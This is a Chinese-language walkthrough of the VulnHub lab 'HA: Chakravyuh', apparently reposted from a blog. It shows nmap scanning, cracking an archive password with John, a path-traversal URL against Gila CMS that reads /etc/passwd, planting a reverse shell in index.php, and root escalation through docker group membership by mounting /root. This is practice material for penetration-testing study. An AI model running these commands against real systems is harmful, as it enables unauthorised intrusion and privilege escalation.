靶機鏈接:
https://www.vulnhub.com/entry/ha-chakravyuh,388/
主機探測掃描:
埠掃描:
╰─ nmap -p- -sC -sV 10.10.202.131
FTP 匿名訪問
下載壓縮檔案,解壓縮需要密碼,基本套路一直,需要密碼,接下來就是找解壓密碼的事情了
目錄列舉下
phpmyadmin 嘗試弱口令密碼爆破未果
phpmyadmin 版本為4.6.6 無RCE之類的漏洞
那么嘗試爆破下載的7z格式的壓縮包檔案
這里使用的工具:
https://github.com/truongkma/ctf-tools/blob/master/John/run/7z2john.py
python 7z2ctf.py arjun.7z > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john hash --show
arjun.7z:family
解壓密碼為:family
解碼獲取的secret.txt的內容為:
Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=
base64解碼為:gila:[email protected]:princesa
gila為一個cms系統,嘗試訪問看看
登錄后臺:http://10.10.202.131/gila/admin
[email protected]:princesa
這里用到的exp https://www.exploit-db.com/exploits/47407
http://10.10.202.131/gila/admin/fm/?f=src../../../../../../../../../etc/passwd
瀏覽到系統目錄檔案,嘗試編輯index.php 添加反shell代碼進去,保存,訪問即可彈回shell
python -c 'import pty;pty.spawn("/bin/bash")'
提權操作:
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
cat /etc/crontab
ls -lh /etc/passwd
netstat -tunlp
沒找到可提權的程式,最后發現當前賬戶的屬組是docker組的,大家都知道docker運行基本都是root權限的身份去執行的
docker run -v /root:/mnt -it alpine
此命令的意思是:docker運行一個互動式的Linux系統alpine,掛載系統的/root 目錄到/mnt目錄下,這樣就可以獲取到root目錄下的檔案內容了,或者直接寫root的crontab 等
OVER!!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/5379.html
標籤:訊息安全